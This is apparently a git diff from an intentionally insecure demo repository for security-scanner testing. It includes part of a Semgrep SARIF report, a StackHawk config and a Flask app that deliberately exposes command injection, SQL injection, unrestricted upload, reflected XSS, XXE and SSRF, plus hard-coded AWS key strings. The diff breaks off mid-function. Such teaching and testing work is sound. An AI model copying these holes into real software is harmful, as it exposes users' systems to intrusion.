input."},"helpUri":"https://semgrep.dev/r/python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","id":"python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","name":"python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","id":"python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","name":"python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","id":"swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","name":"swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","id":"go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","name":"go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","id":"python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","name":"python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","id":"javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","name":"javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","id":"java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","name":"java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server."},"help":{"markdown":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.require-request.require-request)\n - [https://github.com/google/node-sec-roadmap/blob/master/chapter-2/dynamism.md#dynamism-when-you-need-it](https://github.com/google/node-sec-roadmap/blob/master/chapter-2/dynamism.md#dynamism-when-you-need-it)\n","text":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server."},"helpUri":"https://semgrep.dev/r/javascript.express.security.require-request.require-request","id":"javascript.express.security.require-request.require-request","name":"javascript.express.security.require-request.require-request","properties":{"precision":"very-high","tags":["CWE-706: Use of Incorrectly-Resolved Name or Reference","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.require-request.require-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.code.tainted-code-stdlib.tainted-code-stdlib)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://www.stackhawk.com/blog/command-injection-python/](https://www.stackhawk.com/blog/command-injection-python/)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/python.lang.code.tainted-code-stdlib.tainted-code-stdlib","id":"python.lang.code.tainted-code-stdlib.tainted-code-stdlib","name":"python.lang.code.tainted-code-stdlib.tainted-code-stdlib","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.code.tainted-code-stdlib.tainted-code-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","id":"ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","name":"ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","id":"python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","name":"python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","id":"java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","name":"java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/marshal.html](https://docs.python.org/3/library/marshal.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","id":"python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","name":"python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid"}}],"semanticVersion":"1.96.0"}}}],"$schema":"https://docs.oasis-open.org/sarif/sarif/v2.1.0/os/schemas/sarif-schema-2.1.0.json"} \ No newline at end of file diff --git a/insecure-api/stackhawk.yml b/insecure-api/stackhawk.yml new file mode 100644 index 0000000..d45a819 --- /dev/null +++ b/insecure-api/stackhawk.yml @@ -0,0 +1,34 @@ +# -- stackhawk configuration for fastapi -- +app: + # -- An applicationId obtained from the StackHawk platform. -- + applicationId: 7b0e0603-c269-4353-8ee0-6ee39f7c3f2b # (required) + # -- The environment for the applicationId defined in the StackHawk platform. -- + env: Development # (required) + # -- The url of your application to scan -- + host: http://localhost:8000 # (required) + + +# -- Customized Configuration for GraphQL/SOAP/OpenAPI, add here -- + openApiConf: + path: /openapi.json # OR... +# filePath: openApi.json + autoPolicy: true + autoInputVectors: true + # Configuration Docs: https://docs.stackhawk.com/hawkscan/configuration/ + +# -- If Authenticated Scanning is needed, add here -- +tokenAuthorization: + # The method by which the token will be passed to your application. + # In this case a header is expected + type: HEADER + # The name of the header that the token will be passed with requests authenticated routes. + value: admintoken + # The token type when using the Authorization header as is being used here. + # Bearer is the most common value but custom names like "JWT" or "token" are sometimes required. + tokenType: Bearer + # Authenticated Scanning Docs: https://docs.stackhawk.com/hawkscan/authenticated-scanning.html + # Authenticated Scanning Repo: https://github.com/kaakaww/scan-configuration/tree/main/Authentication + +# -- Help Section -- + # Docs: https://docs.stackhawk.com/ + # Contact Support: support@stackhawk.com \ No newline at end of file diff --git a/insecure-api/videogames.db b/insecure-api/videogames.db new file mode 100644 index 0000000..8bba0ac Binary files /dev/null and b/insecure-api/videogames.db differ diff --git a/insecure-app/Dockerfile b/insecure-app/Dockerfile index 267a68f..1f73cb0 100644 --- a/insecure-app/Dockerfile +++ b/insecure-app/Dockerfile @@ -4,6 +4,9 @@ FROM ubuntu:20.04 # Avoid interactive dialog during package installation ENV DEBIAN_FRONTEND=noninteractive +# Set SCRIPT_NAME for ingress-nginx +ENV SCRIPT_NAME=/app + # Install Python, pip, and Docker CLI RUN apt-get update && \ apt-get install -y python3 python3-pip curl apt-transport-https ca-certificates software-properties-common && \ @@ -19,8 +22,9 @@ RUN mkdir /app WORKDIR /app # Add application and requirements.txt -ADD ./insecure-app/app.py /app/ -ADD ./insecure-app/requirements.txt /app/ +COPY app.py /app/ +COPY requirements.txt /app/ +COPY templates /app/templates/ # Install Python packages from requirements.txt RUN python3 -m pip install --no-cache-dir -r requirements.txt diff --git a/insecure-app/app.py b/insecure-app/app.py index b8dc202..0939a30 100644 --- a/insecure-app/app.py +++ b/insecure-app/app.py @@ -1,63 +1,173 @@ -from flask import Flask, request, render_template_string, send_from_directory +from flask import Flask, request, render_template, jsonify, redirect, url_for import subprocess import os import sqlite3 +import requests +from lxml import etree +import json +from werkzeug.middleware.dispatcher import DispatcherMiddleware +from werkzeug.serving import run_simple +# Example hardcoded AWS credentials (sensitive data leakage) aws_access_key_id = 'AKIA2JAPX77RGLB664VE' aws_secret = 'v5xpjkWYoy45fGKFSMajSn+sqs22WI2niacX9yO5' app = Flask(__name__) -@app.route('/', methods=['GET', 'POST']) -def index(): +# Get the script name from environment variable or default to empty string +SCRIPT_NAME = os.environ.get('SCRIPT_NAME', '') + +# Determine if we're running locally +IS_LOCAL = os.environ.get('FLASK_ENV') == 'development' + +# Set up paths relative to the app directory +APP_DIR = os.path.dirname(os.path.abspath(__file__)) +DB_PATH = os.path.join(APP_DIR, 'data', 'tutorial.db') +UPLOADS_DIR = os.path.join(APP_DIR, 'data', 'uploads') + +def init_db(): + # Create data and uploads directories if they don't exist + os.makedirs(os.path.dirname(DB_PATH), exist_ok=True) + os.makedirs(UPLOADS_DIR, exist_ok=True) + + # Create database and tables if they don't exist + conn = sqlite3.connect(DB_PATH) + cursor = conn.cursor() + + # Create users table + cursor.execute(''' + CREATE TABLE IF NOT EXISTS users ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + username TEXT NOT NULL, + password TEXT NOT NULL + ) + ''') + + # Insert some sample data if the table is empty + cursor.execute("SELECT COUNT(*) FROM users") + if cursor.fetchone()[0] == 0: + cursor.execute("INSERT INTO users (username, password) VALUES ('admin', 'admin123')") + cursor.execute("INSERT INTO users (username, password) VALUES ('user1', 'password123')") + + conn.commit() + conn.close() + +# Initialize database when the app starts +init_db() + +def get_form_action(): + if IS_LOCAL: + return "/app/app/result" + return f"{SCRIPT_NAME}/result" + +@app.route('/') +def app_route(): + return render_template('index.html', script_name=SCRIPT_NAME, form_action=get_form_action()) + +@app.route('/result', methods=['POST']) +def result(): output = '' - # SQL Injection? - db = sqlite3.connect("tutorial.db") + # 1 - SQL Injection + db = sqlite3.connect(DB_PATH) cursor = db.cursor() username = '' password = '' try: - #the % is what makes it bad, instead of passing them in as parameters cursor.execute("SELECT * FROM users WHERE username = '%s' AND password = '%s'" % (username, password)) except: pass - if request.method == 'POST': - if 'command' in request.form: - cmd = request.form['command'] - process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - stdout, stderr = process.communicate() - if process.returncode == 0: - output = stdout.decode('utf-8') - else: - output = f"Error (Exit Code: {process.returncode}):\n{stderr.decode('utf-8')}" - elif 'file' in request.files: - uploaded_file = request.files['file'] - uploaded_file.save(os.path.join('/uploads', uploaded_file.filename)) - output = f"File {uploaded_file.filename} uploaded successfully!" - elif 'sql' in request.form: - sql = request.form['sql'] + + # 2 - Command Injection + if 'command' in request.form: + cmd = request.form['command'] + process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + stdout, stderr = process.communicate() + if process.returncode == 0: + output = stdout.decode('utf-8') + else: + output = f"Error (Exit Code: {process.returncode}):\n{stderr.decode('utf-8')}" + + # 3 - File Upload with no restrictions, and path traversal + elif 'file' in request.files: + uploaded_file = request.files['file'] + uploaded_file.save(os.path.join(UPLOADS_DIR, uploaded_file.filename)) + output = f"File {uploaded_file.filename} uploaded successfully!" + + # 4 - SQL Injection via input + elif 'sql' in request.form: + sql = request.form['sql'] + try: + # Execute the user's SQL query cursor.execute(sql) - output = 'SQL command executed successfully!' - - return render_template_string(""" -

Intentionally Insecure App

-
- Run a command: - -
-
-
- Upload a file: - -
-
-
- Inject some SQL - -
- 
{{output}}
- """, output=output) + # Fetch all rows from the query result + rows = cursor.fetchall() + # Format the results for display + if rows: + output = "Results:\n" + "\n".join(str(row) for row in rows) + else: + output = "Query executed successfully, but no results found." + except Exception as e: + output = f"SQL Error: {e}" + + # 5 - Cross-Site Scripting (XSS) + elif 'xss' in request.form: + xss_input = request.form['xss'] + output = f"Reflected XSS result: {xss_input}" + # 6 - XML External Entity (XXE) Injection + elif 'xml' in request.form: + xml_data = request.form['xml'] + try: + # Use lxml to parse the XML data + parser = etree.XMLParser(load_dtd=True, resolve_entities=True) + tree = etree.fromstring(xml_data.encode(), parser) + output = f"Parsed XML: {etree.tostring(tree, encoding='unicode')}" + except Exception as e: + output = f"XML Parsing Error: {e}" + + # 7 - Server-Side Request Forgery (SSRF) + elif 'url' in request.form: + url = request.form['url'] + try: + # Get headers and data from form if provided + headers = {} + if 'headers' in request.form: + headers = json.loads(request.form['headers']) + + data = None + if 'data' in request.form: + data = request.form['data'] + + # Use POST method and handle data + response = requests.post(url, headers=headers, data=data, verify=False) + output = f"SSRF Response: {response.text[:200]}" + except Exception as e: + 